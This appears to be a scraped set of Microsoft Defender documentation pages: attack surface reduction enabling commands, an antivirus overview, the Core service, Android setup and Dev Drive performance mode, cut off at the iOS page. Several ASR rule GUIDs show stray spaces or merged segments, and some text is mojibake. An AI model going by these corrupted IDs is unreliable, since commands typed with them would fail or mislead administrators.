-|Block known malicious attack vectors with [Attack surface reduction](attack-surface-reduction.md)|Add-MpPreference -AttackSurfaceReductionRules\_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules\_Actions Enabled </br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids D4F940AB-401B-4EfC-AADCAD5F3C50688A -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids BE9BA2D9-53EA-4CDC-84E5- 9B1EEEE46550 -AttackSurfaceReductionRules\_Actions Enabled </br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 01443614-CD74-433A-B99E2ECDC07BFC25 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 5BEB7EFE-FD9A-4556801D275E5FFC04CC -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids D3E037E1-3EB8-44C8-A917- 57927947596D -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 3B576869-A4EC-4529-8536- B80A7769E899 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 75668C1F-73B5-4CF0-BB93- 3ECF5CB7CC84 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids D1E49AAC-8F56-4280-B9BA993A6D77406C -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 33ddedf1-c6e0-47cb-833e-de6133960387 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids B2B3F03D-6A65-4F7B-A9C7- 1C7EF74A9BA4 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids 92E97FA1-2EDF-4476-BDD6- 9DD0B4DDDC7B -AttackSurfaceReductionRules\_Actions Enabled</br>Add-MpPreference -AttackSurfaceReductionRules\_Ids C1DB55AB-C21A-4637-BB3FA12568109D35 -AttackSurfaceReductionRules\_Actions Enabled|
-
-Some rules may block behavior you find acceptable in your organization. In these cases, change the rule from Enabled to Audit to prevent unwanted blocks.
-
-## One-click Microsoft Defender Offline Scan
-
-Microsoft Defender Offline Scan is a specialized tool that comes with Windows 10 or newer, and allows you to boot a machine into a dedicated environment outside of the normal operating system. ItΓÇÖs especially useful for potent malware, such as rootkits.
-
-See [Microsoft Defender Offline](microsoft-defender-offline.md) for more information on how this feature works.
-
-| Description | PowerShell Command |
-|||
-|Ensure notifications allow you to boot the PC into a specialized malware removal environment|Set-MpPreference -UILockdown 0|
-
-## Resources
-
-This section lists many resources that can assist you with evaluating Microsoft Defender Antivirus.
--- [Microsoft Defender in Windows 10 library](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Windows Server 2016 library](/windows-server/security/windows-defender/windows-defender-overview-windows-server)-- [Windows 10 security library](/windows/resources/)-- [Windows 10 security overview](/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10)-- [Microsoft Defender Security Intelligence (Microsoft Malware Protection Center (MMPC)) website ΓÇô threat research and response](https://www.microsoft.com/wdsi)-- [Microsoft Security website](https://www.microsoft.com/security)-- [Microsoft Security blog](https://www.microsoft.com/security/blog)
security Microsoft Defender Antivirus Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows.md
- Title: Microsoft Defender Antivirus in Windows Overview
-description: Learn how to manage, configure, and use Microsoft Defender Antivirus, built-in antimalware and antivirus protection.
- Previously updated : 01/16/2024---------- m365-security-- tier2-- mde-ngp--
-# Microsoft Defender Antivirus in Windows Overview
-
-**Applies to:**
--- Microsoft Defender for Endpoint Plans 1 and 2-- Microsoft Defender for Business-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-Microsoft Defender Antivirus is available in Windows 10 and Windows 11, and in versions of Windows Server.
-
-Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your device and in the cloud.
-
-## Microsoft Defender Antivirus capabilities
-
-Microsoft Defender Antivirus provides anomaly detection, a layer of protection for malware that doesnΓÇÖt fit any predefined pattern. Anomaly detection monitors for process creation events or files that are downloaded from the internet. Through machine learning and cloud-delivered protection, Microsoft Defender Antivirus can stay one step ahead of attackers. Anomaly detection is on by default and can help block attacks such as [3CX Security Alert for Electron Windows App](https://www.3cx.com/blog/news/desktopapp-security-alert/). Microsoft Defender Antivirus started blocking this malware four days before the attack was registered in VirusTotal.
-
-Modern malware requires modern solutions. In 2015, Microsoft Defender Antivirus moved away from using a static signature-based engine to a model that uses predictive technologies such as, machine learning, applied science, and artificial intelligence as this is what's necessary to keep you and your organizations safe from the complexity of todayΓÇÖs ever-evolving malware landscape.
-
-Microsoft Defender Antivirus can block almost all malware at first sight, in milliseconds.
-
-WeΓÇÖve also designed our antivirus solution to work in both online and offline scenarios. For offline scenarios, the latest dynamic intelligence from the Intelligence Security Graph is provisioned to the endpoint regularly throughout the day. When connected to the cloud, itΓÇÖs fed real-time intelligence from the [Intelligent Security Graph](https://www.microsoft.com/security/blog/2018/04/17/connect-to-the-intelligent-security-graph-using-a-new-api/).
-
-Microsoft Defender Antivirus can also stop threats based on their behaviors and process trees even when the threat has started execution. A common example of these kinds of attacks is fileless malware. Microsoft's Next-generation protection features work together to identify and block malware based on abnormal behavior. To learn more, see [Behavioral blocking and containment](behavioral-blocking-containment.md).
-
-## Compatibility with other antivirus products
-
-If you're using a non-Microsoft antivirus/antimalware product on your device, you might be able to run Microsoft Defender Antivirus in passive mode alongside the non-Microsoft antivirus solution. It depends on the operating system used and whether your device is onboarded to Defender for Endpoint. To learn more, see [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).
-
-## Microsoft Defender Antivirus processes and services
-
-The following table summarizes Microsoft Defender Antivirus processes and services. You can view them in Task Manager in Windows.
-
-| Process or service | Where to view its status |
-|--|--|
-| **Microsoft Defender Antivirus Core service** <br/>(`MdCoreSvc`) | - **Processes** tab: `Antimalware Core Service` <br/>- **Details** tab: `MpDefenderCoreService.exe` <br/>- **Services** tab: `Microsoft Defender Core Service` |
-| **Microsoft Defender Antivirus service** <br/>(`WinDefend`) | - **Processes** tab: `Antimalware Service Executable` <br/>- **Details** tab: `MsMpEng.exe` <br/>- **Services** tab: `Microsoft Defender Antivirus` |
-| **Microsoft Defender Antivirus Network Realtime Inspection service** <br/>(`WdNisSvc`) | - **Processes** tab: `Microsoft Network Realtime Inspection Service` <br/>- **Details** tab: `NisSrv.exe` <br/>- **Services** tab: `Microsoft Defender Antivirus Network Inspection Service` |
-| **Microsoft Defender Antivirus command-line utility** | - **Processes** tab: N/A <br/>- **Details** tab: `MpCmdRun.exe` <br/>- **Services** tab: N/A |
-| **Microsoft Security Client Policy Configuration Tool** | - **Processes** tab: N/A <br/>- **Details** tab: `ConfigSecurityPolicy.exe` <br/>- **Services** tab: N/A |
-
-To learn more about the Microsoft Defender Core service, please visit [Microsoft Defender Core service overview](/microsoft-365/security/defender-endpoint/microsoft-defender-core-service-overview).
-
-For [Microsoft Endpoint Data Loss Prevention](/purview/endpoint-dlp-getting-started) (Endpoint DLP), the following table summarizes processes and services. You can view them in Task Manager in Windows.
-
-| Process or service | Where to view its status |
-|--|--|
-| **Microsoft Endpoint DLP service** <br/>(`MDDlpSvc`) | - **Processes** tab: `MpDlpService.exe` <br/>- **Details** tab: `MpDlpService.exe` <br/>- **Services** tab: `Microsoft Data Loss Prevention Service` |
-| **Microsoft Endpoint DLP command-line utility** | - **Processes** tab: N/A <br/>- **Details** tab: `MpDlpCmd.exe` <br/>- **Services** tab: N/A |
-
-## Comparing active mode, passive mode, and disabled mode
-
-The following table describes what to expect when Microsoft Defender Antivirus is in active mode, passive mode, or disabled.
-
-| Mode | What happens |
-|||
-| Active mode | In active mode, Microsoft Defender Antivirus is used as the primary antivirus app on the device. Files are scanned, threats are remediated, and detected threats are listed in your organization's security reports and in your Windows Security app. |
-| Passive mode | In passive mode, Microsoft Defender Antivirus is not used as the primary antivirus app on the device. Files are scanned, and detected threats are reported, but threats are not remediated by Microsoft Defender Antivirus. <br/><br/> **IMPORTANT**: Microsoft Defender Antivirus can run in passive mode only on endpoints that are onboarded to Microsoft Defender for Endpoint. See [Requirements for Microsoft Defender Antivirus to run in passive mode](microsoft-defender-antivirus-compatibility.md#requirements-for-microsoft-defender-antivirus-to-run-in-passive-mode). |
-| Disabled or uninstalled | When disabled or uninstalled, Microsoft Defender Antivirus is not used. Files are not scanned, and threats are not remediated. In general, we do not recommend disabling or uninstalling Microsoft Defender Antivirus. |
-
-To learn more, see [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).
-
-## Check the state of Microsoft Defender Antivirus on your device
-
-You can use one of several methods, such as the Windows Security app or Windows PowerShell, to check the state of Microsoft Defender Antivirus on your device.
-
-> [!IMPORTANT]
-> Beginning with [platform version 4.18.2208.0 and later](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions): If a server has been onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender" [group policy](configure-endpoints-gp.md#update-endpoint-protection-configuration) setting will no longer completely disable Windows Defender Antivirus on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In addition, the [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) feature will allow a switch to active mode but not to passive mode.
->
-> - If "Turn off Windows Defender" is already in place before onboarding to Microsoft Defender for Endpoint, there will be no change and Defender Antivirus will remain disabled.
-> - To switch Defender Antivirus to passive mode, even if it was disabled before onboarding, you can apply the [ForceDefenderPassiveMode configuration](switch-to-mde-phase-2.md#set-microsoft-defender-antivirus-to-passive-mode-on-windows-server) with a value of `1`. To place it into active mode, switch this value to `0` instead.
->
-> Note the modified logic for `ForceDefenderPassiveMode` when tamper protection is enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper protection will prevent it from going back into passive mode even when `ForceDefenderPassiveMode` is set to `1`.
-
-### Use the Windows Security app to check the status of Microsoft Defender Antivirus
-
-1. On your Windows device, select the **Start** menu, and begin typing `Security`. Then open the Windows Security app in the results.
-
-2. Select **Virus & threat protection**.
-
-3. Under **Who's protecting me?**, choose **Manage Providers**.
-
-You'll see the name of your antivirus/antimalware solution on the security providers page.
-
-### Use PowerShell to check the status of Microsoft Defender Antivirus
-
-1. Select the **Start** menu, and begin typing `PowerShell`. Then open Windows PowerShell in the results.
-
-2. Type `Get-MpComputerStatus`.
-
-3. In the list of results, look at the **AMRunningMode** row.
-
- - **Normal** means Microsoft Defender Antivirus is running in active mode.
-
- - **Passive mode** means Microsoft Defender Antivirus running, but is not the primary antivirus/antimalware product on your device. Passive mode is only available for devices that are onboarded to Microsoft Defender for Endpoint and that meet certain requirements. To learn more, see [Requirements for Microsoft Defender Antivirus to run in passive mode](microsoft-defender-antivirus-compatibility.md#requirements-for-microsoft-defender-antivirus-to-run-in-passive-mode).
-
- - **EDR Block Mode** means Microsoft Defender Antivirus is running and [Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md), a capability in Microsoft Defender for Endpoint, is enabled. Check the **ForceDefenderPassiveMode** registry key. If its value is 0, it is running in normal mode; otherwise, it is running in passive mode.
-
- - **SxS Passive Mode** means Microsoft Defender Antivirus is running alongside another antivirus/antimalware product, and [limited periodic scanning is used](limited-periodic-scanning-microsoft-defender-antivirus.md).
-
-> [!TIP]
-> To learn more about the Get-MpComputerStatus PowerShell cmdlet, see the reference article [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus).
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
-## Get your antivirus/antimalware platform updates
-
-It's important to keep Microsoft Defender Antivirus (or any antivirus/antimalware solution) up to date. Microsoft releases regular updates to help ensure that your devices have the latest technology to protect against new malware and attack techniques. To learn more, see [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Microsoft Defender Antivirus management and configuration](configuration-management-reference-microsoft-defender-antivirus.md)-- [Evaluate Microsoft Defender Antivirus protection](evaluate-microsoft-defender-antivirus.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Microsoft Defender Core Service Configurations And Experimentation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-core-service-configurations-and-experimentation.md
- Title: Microsoft Defender Core service configurations and experimentation
-description: Understand the interaction between Microsoft Defender Core Service and the Experimentation and Configuration Service (ECS).
---- Previously updated : 03/26/2024----- m365-security-- tier3-- mde-ngp--
-# Microsoft Defender Core service configurations and experimentation
-
-This article describes the interaction between Microsoft Defender Core Service and the Experimentation and Configuration Service (ECS). Microsoft Defender Core Service is a part of Microsoft Defender Antivirus and communicates with ECS to request and receive different kinds of payloads. These payloads include configurations, feature rollouts, and experiments.
-
-> [!IMPORTANT]
-> Make sure clients can access the following URLs so payloads can be received:
->
-> Enterprise customers should allow the following URLs:
-> - `*.events.data.microsoft.com`
-> - `*.endpoint.security.microsoft.com`
-> - `*.ecs.office.com`
->
->Enterprise U.S. Government customers should allow the following URLs:
-> - `*.events.data.microsoft.com`
-> - `*.endpoint.security.microsoft.us (GCC-H & DoD)`
-> - `*.gccmod.ecs.office.com (GCC-M) *.config.ecs.gov.teams.microsoft.us (GCC-H)`
-> - `*.config.ecs.dod.teams.microsoft.us (DoD)`
-
-> [!NOTE]
-> This applies to Microsoft Defender Antivirus platform update version [4.18.24030](microsoft-defender-antivirus-updates.md) or later.
-
-## Configurations
-
-Configurations are the payload meant to ensure product health, security, and privacy compliance, and are intended to have the same value for all the users (based on platforms and channels.) This could be to enable a feature flag for a domain action, and can also be used to disable a feature flag in the event of a bug.
-
-## Controlled Feature Rollout
-
-Controlled Feature Rollout (CFR) is a procedure for slowly increasing the size of the user group that receives a feature. By distributing a new feature to a randomly selected subset of the user population, it's possible to compare user feedback to an equally sized control group without the feature to measure the impact of the feature.
-
-## Experiments
-
-Microsoft Defender Core Service builds have features and functionality that are still in development or are experimental. Experiments are like CFR, but the size of the user group is much smaller for testing the new concept. These features are hidden by default until the feature's rolled out or the experiment's finished. Experiment flags are used to enable and disable these features.
-
-> [!CAUTION]
-> If you disable communications with the service, this will affect Microsoft's ability to respond to a severe bug in a timely manner.
-
-## See also
--- [Microsoft Defender Antivirus in Windows | Microsoft Learn](microsoft-defender-antivirus-windows.md) -
security Microsoft Defender Core Service Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-core-service-overview.md
- Title: Microsoft Defender Core service overview
-description: Get an overview of Microsoft Defender Core service.
------- Previously updated : 04/10/2024--- m365-security-- tier2--
-# Microsoft Defender Core service overview
-
-Microsoft Defender Core service
-
-To enhance your endpoint security experience, Microsoft is releasing the Microsoft Defender Core service to help with the stability and performance of Microsoft Defender Antivirus.
-
-The Microsoft Defender Core service is releasing with [Microsoft Defender Antivirus platform version 4.18.23110.2009](./msda-updates-previous-versions-technical-upgrade-support.md#october-2023-platform-418231002009--engine-11231002009).
--- Rollout begins in:-
- - November 2023 to prerelease customers,
-
- - Mid April 2024 to Enterprise customers running Windows clients.
-
- - Mid May 2024 to Enterprise customers running Windows Servers.
-
- - Mid June 2024 to U.S. Government customers running Windows clients and Windows Servers.
-
-- Enterprise customers should allow the following URLs:-
- - `*.events.data.microsoft.com`
-
- - `*.endpoint.security.microsoft.com`
-
- - `*.ecs.office.com`
-
-- Enterprise U.S. Government customers should allow the following URLs:-
- - `*.events.data.microsoft.com`
-
- - `*.endpoint.security.microsoft.us (GCC-H & DoD)`
-
- - `*.gccmod.ecs.office.com (GCC-M)`
-
- - `*.config.ecs.gov.teams.microsoft.us (GCC-H)`
-
- - `*.config.ecs.dod.teams.microsoft.us (DoD)`
-
-- If you're using [Application Control for Windows](/windows/security/application-security/application-control/windows-defender-application-control/wdac), or you're running non-Microsoft antivirus or endpoint detection and response software, make sure to add the processes mentioned earlier to your allowlist. --- Consumers don't need to take any actions to prepare. -
-## Microsoft Defender Antivirus processes and services
-
-The following table summarizes where you can view Microsoft Defender Antivirus processes and services (`MdCoreSvc`) using Task Manager on Windows devices.
-
-| Process or service | Where to view its status |
-|--|--|
-| `Antimalware Core Service` | **Processes** tab |
-| `MpDefenderCoreService.exe` | **Details** tab |
-| `Microsoft Defender Core Service` | **Services** tab |
-
-To learn more about the Microsoft Defender Core service configurations and experimentation (ECS), see [Microsoft Defender Core service configurations and experimentation](microsoft-defender-core-service-configurations-and-experimentation.md).
-
security Microsoft Defender Endpoint Android https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-android.md
- Title: Microsoft Defender for Endpoint on Android-
-description: Describes how to install and use Microsoft Defender for Endpoint on Android
------- m365-security-- tier3-- mde-android-- Previously updated : 08/15/2023--
-# Microsoft Defender for Endpoint on Android
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This topic describes how to install, configure, update, and use Defender for Endpoint on Android.
-
-> [!CAUTION]
-> Running other third-party endpoint protection products alongside Defender for Endpoint on Android is likely to cause performance problems and unpredictable system errors.
-
-## How to install Microsoft Defender for Endpoint on Android
-
-### Prerequisites
--- **For end users**:
- - The end user must be assigned a Microsoft Intune license. For more information on how to assign licenses, see [Assign licenses to users](/azure/active-directory/users-groups-roles/licensing-groups-assign).
- - The users of the app must be assigned a Microsoft Defender for Endpoint license. For more information on how to assign licenses, see [Microsoft Defender for Endpoint licensing requirements](/microsoft-365/security/defender-endpoint/minimum-requirements#licensing-requirements).
- - Intune Company Portal app can be downloaded from [Google Play](https://play.google.com/store/apps/details?id=com.microsoft.windowsintune.companyportal) and is available on the Android device.
- - Additionally, device(s) can be [enrolled](/mem/intune/user-help/enroll-device-android-company-portal) via the Intune Company Portal app to enforce Intune device compliance policies.
--- **For Administrators**:
- - Access to the Microsoft Defender portal.
- - Access to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) to:
- - Deploy the app to enrolled user groups in your organization.
- - Configure Microsoft Defender for Endpoint risk signals in app protection policy.
-
- > [!NOTE]
- >
- > - Microsoft Defender for Endpoint now extends protection to an organization's data within a managed application (MAM) for devices that are not enrolled using mobile device management (MDM), but are using Intune to manage mobile applications. It also extends this support to customers who use other enterprise mobility management solutions, while still using Intune for [mobile application management (MAM)](/mem/intune/apps/mam-faq).
- > - In addition, Microsoft Defender for Endpoint already supports devices that are enrolled using Intune mobile device management (MDM).
-
-### Network Requirements
--- For Microsoft Defender for Endpoint on Android to function when connected to a network the firewall/proxy will need to be configured to [enable access to Microsoft Defender for Endpoint service URLs](configure-environment.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server).-
-### System Requirements
--- Mobile phones and tablets running Android 8.0 and above. **Mobile phones running Android go and other mobile devices running Android are not currently supported.**-- Intune Company Portal app is downloaded from [Google Play](https://play.google.com/store/apps/details?id=com.microsoft.windowsintune.companyportal) and installed. Device enrollment is required for Intune device compliance policies to be enforced.-
- > [!NOTE]
- > Microsoft Defender for Endpoint on Android isn't supported on userless or shared devices.
-
-### Installation instructions
-
-Microsoft Defender for Endpoint on Android supports installation on both modes of enrolled devices - the legacy Device Administrator and Android Enterprise modes. **Currently, Personally-owned devices with work profile, Corporate-owned devices with work profile, and Corporate-owned fully managed user device enrollments are supported in Android Enterprise. Support for other Android Enterprise modes will be announced when ready.**
--- Deployment of Microsoft Defender for Endpoint on Android is via Microsoft Intune (MDM). For more information, see [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md).-- Installation of Microsoft Defender for Endpoint on devices that are not enrolled using Intune mobile device management (MDM), see [Configure Microsoft Defender for Endpoint risk signals in app protection policy (MAM)](android-configure-mam.md).-
-> [!NOTE]
-> **Microsoft Defender for Endpoint on Android is available on [Google Play](https://play.google.com/store/apps/details?id=com.microsoft.scmx) now.**
->
-> You can connect to Google Play from Intune to deploy Microsoft Defender for Endpoint app, across Device Administrator and Android Enterprise enrollment modes.
-
-## How to Configure Microsoft Defender for Endpoint on Android
-
-Guidance on how to configure Microsoft Defender for Endpoint on Android features is available in [Configure Microsoft Defender for Endpoint on Android features](android-configure.md).
-
-## Related topics
--- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)-- [Configure Microsoft Defender for Endpoint on Android features](android-configure.md)-- [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security Microsoft Defender Endpoint Antivirus Performance Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-antivirus-performance-mode.md
- Title: Protect Dev Drive using performance mode
-description: Learn how to manage, configure, Microsoft Defender Antivirus performance mode for developers who use Dev Drive.
----------- m365-security-- tier2 Previously updated : 02/22/2024--
-# Protect Dev Drive using performance mode
-
-> [!NOTE]
-> Want to experience Microsoft Defender XDR? Learn more about how you can [evaluate and pilot Microsoft Defender XDR](/microsoft-365/security/defender/eval-overview?ocid=cx-docs-MTPtriallab).
-
-**Applies to:**
--- Microsoft Defender for Endpoint Plans 1 and 2-- Microsoft Defender for Business-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows 11-
-## What is performance mode
-
-Performance mode is now available on Windows 11 as a new Microsoft Defender Antivirus capability. Performance mode reduces the performance impact of Microsoft Defender Antivirus scans for files stored on designated _Dev Drive_. The goal of performance mode is to improve functional performance for developers who use Windows 11 devices.
-
-It's important to note that performance mode can run only on Dev Drive. Additionally, real-time protection must be turned on for performance mode to function. Enabling this feature on a Dev Drive doesn't change standard real-time protection running on volumes with operating systems or other volumes formatted FAT32 or NTFS.
-
-### Dev Drive
-
-Dev Drive is a new form of storage volume available to improve performance for key developer workloads. It builds on ReFS technology to employ targeted file system optimizations and provide more control over storage volume settings and security, including trust designation, antivirus configuration, and administrative control over which filters are attached.
-
-For more information about Dev Drive, see: [Set up a Dev Drive on Windows 11](/windows/dev-drive).
-
-### Performance mode compared to real-time protection
-
-By default, to give the best possible performance, creating a Dev Drive automatically grants trust in the new volume. A _trusted_ Dev Drive volume causes real-time protection to run in a special _asynchronous_ performance mode for that volume. Running performance mode provides a balance between threat protection and performance. The balance is achieved by deferring security scans until after the _open file_ operation has completed, instead of performing the security scan synchronously while the file operation is being processed. This mode of performing security scans inherently provides faster performance, but with less protection. However, enabling performance mode provides significantly better protection than other _performance tuning_ methods such as using folder exclusions, which block security scans altogether.
-
-> [!NOTE]
-> To enable performance mode, real-time protection must be turned on.
-
-The following table summarizes performance mode synchronous and asynchronous scan behavior.
-
-| Performance mode state | Scan type | Description | Summary |
-|:|:|:|:|
-|Not enabled (Off) | **Synchronous** <br> (Real-time protection) | Opening a file initiates a real-time protection scan. | Open now, scan now. |
-|Enabled (On) | **Asynchronous** | File open operations are scanned asynchronously. | Open now, scan later. |
-
-An _untrusted_ Dev Drive doesn't have the same benefits as a _trusted_ Dev Drive. Security runs in synchronous, real-time protection mode when a Dev Drive is _untrusted_. Real-time protection scans can affect performance.
-
-## Microsoft Defender Antivirus requirements for performance mode
-
-1. Review the requirements that are specific to Dev Drive. See [Set up a Dev Drive on Windows 11](/windows/dev-drive).
-
-2. Make sure Microsoft Defender Antivirus is up to date.
-
- - Antimalware platform version: `4.18.2303.8` (or later)
- - Antimalware security intelligence version: `1.385.1455.0` (or later)
- - Real-time protection is turned on
-
-## Manage performance mode
-
-1. Performance mode can only run on a *trusted* Dev Drive and is enabled by default when a new Dev Drive is created. For more information, see [Understanding security risks and trust in relation to Dev Drive](/windows/dev-drive#understanding-security-risks-and-trust-in-relation-to-dev-drive).
-
-2. Enforce the Microsoft Defender Antivirus Performance Mode by using Intune, Group Policy, or PowerShell.
-
-### Intune
-
-Enable performance mode status via the OMA-URI settings shown in the following table.
-
-| Setting | Value |
-| -- | -- |
-|OMA-URI:| ./Device/Vendor/MSFT/Defender/Configuration/PerformanceModeStatus |
-|Data type|Integer|
-|Value|1|
-
-### Group Policy
-
-1. In GPMC.msc or GPedit.msc, go to **Computer Configuration** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus** > **Real-time Protection**.
-
-2. Double-click **Configure performance mode status**.
-
- :::image type="content" alt-text="Screenshot of Defender_Performance_Mode_10." source="media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-10.png" lightbox="media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-10.png":::
-
-3. Select **Enabled**.
-
- ![Screenshot of Defender_Performance_Mode_11.](media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-11.png)
-
-4. Select **Apply**, and then select **OK**.
-
-### PowerShell
-
-1. Open PowerShell as an administrator on the device.
-
-2. Type `set-MpPreference -PerformanceModeStatus Enabled`, and then press Enter.
-
- ![Screenshot of Defender_Performance_Mode_04.](media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-5.png)
-
-## Verify performance mode is enabled
-
-To verify that Dev Drive and Defender Performance Mode is enabled, follow these steps:
-
-1. In the Windows Security App, go to **Virus & threat Protection settings** > **Manage settings**, and verify that Dev Drive protection is enabled.
-
- :::image type="content" alt-text="Screenshot of Defender_Performance_Mode_02." source="media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-02.png":::
-
-2. Select **See volumes**.
-
- :::image type="content" alt-text="Screenshot of Defender_Performance_Mode_03." source="media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-03.png" lightbox="media/microsoft-defender-endpoint-antivirus-performance-mode/defender-performance-mode-03.png":::
-
- |Drive| Status|
- | -- | -- |
- | C: |Since the system drive (for example, C: or D:) drive is formatted with NTFS, it's not eligible for Defender Performance mode.|
- |D:|Dev Drive is enabled but Defender Performance mode isn't enabled.|
- |F:|Dev Drive is enabled, and Defender Performance mode is enabled.|
-
-## See also
-
-[Set up a Dev Drive on Windows 11](/windows/dev-drive)
-
security Microsoft Defender Endpoint Ios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-ios.md
- Title: Microsoft Defender for Endpoint on iOS-
-description: Describes how to install and use Microsoft Defender for Endpoint on iOS
------- m365-security-- tier3-- mde-ios-- Previously updated : 02/22/2024--
-# Microsoft Defender for Endpoint on iOS
--
-**Applies to:**
